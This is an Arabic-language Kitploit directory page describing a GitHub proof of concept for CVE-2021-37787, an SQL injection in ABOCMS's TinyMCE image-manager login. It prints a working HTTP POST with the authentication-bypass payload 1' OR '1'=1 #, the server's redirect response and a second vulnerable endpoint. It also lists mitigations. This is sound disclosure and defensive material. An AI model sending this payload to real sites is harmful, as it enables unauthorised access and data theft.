Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/vasykor/cve-2021-37787
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubvasykor/cve-2021-37787

CVE-2021-37787

CVE-2021-37787

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-37787: حقن SQL في ABOCMS عبر وحدة TinyMCE

تفاصيل الثغرة

  • CVE ID: CVE-2021-37787
  • Product: ABOCMS
  • Affected Version(s): 5.8.x, ≤5.9.3
  • Vulnerability Type: حقن SQL
  • CVSS Score: 9.8

الوصف

توجد ثغرة حرجة في حقن SQL في ABOCMS ضمن وحدة TinyMCE. تنشأ الثغرة نتيجة عدم كفاية تعقيم المدخلات في تفاعل وحدة TinyMCE مع قاعدة البيانات، مما يسمح للمهاجم بحقن استعلامات SQL خبيثة. قد يؤدي ذلك إلى وصول غير مصرح به إلى البيانات، أو تعديلها، أو حتى اختراق كامل لقاعدة البيانات الأساسية.

تقع نقطة النهاية المعرضة للخطر في معالجة وحدة TinyMCE للمدخلات المقدمة من المستخدم. يمكن للمهاجم استغلال هذا الخلل لتنفيذ أوامر SQL عشوائية.

التأثير

  • تجاوز المصادقة.
  • استخراج البيانات الحساسة.
  • تعديل أو حذف سجلات قاعدة البيانات.
  • تنفيذ محتمل لتعليمات برمجية عن بُعد، اعتمادًا على إعدادات قاعدة البيانات.

إثبات المفهوم (PoC)

طلب POST

root@kitploit:~
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded

return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login

الاستجابة

root@kitploit:~
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html

نقطة النهاية المعرضة للخطر

يمكن استغلال الثغرة عبر نقطة النهاية التالية:

/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php

الإجراءات التخفيفية

  • للمستخدمين:

    • قم بالترقية إلى أحدث إصدار من ABOCMS.
    • عطّل وحدة TinyMCE إذا لم تكن ضرورية.
  • للمطورين:

    • استخدم البيانات المهيأة مسبقًا (prepared statements) أو الاستعلامات المعيارية (parameterized queries) للتفاعل مع قاعدة البيانات.
    • حدّث وحدة TinyMCE إلى أحدث إصدار آمن.
    • طبّق تحققًا مناسبًا من المدخلات لتصفية الحمولات الخبيثة.

إخلاء مسؤولية

يُقدَّم إثبات المفهوم (PoC) هذا لأغراض تعليمية وبحث أمني فقط. لا تستخدم هذا الكود لإلحاق الضرر بالأنظمة أو الشبكات دون إذن صريح من المالك. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الإثبات.

تنزيل الأداة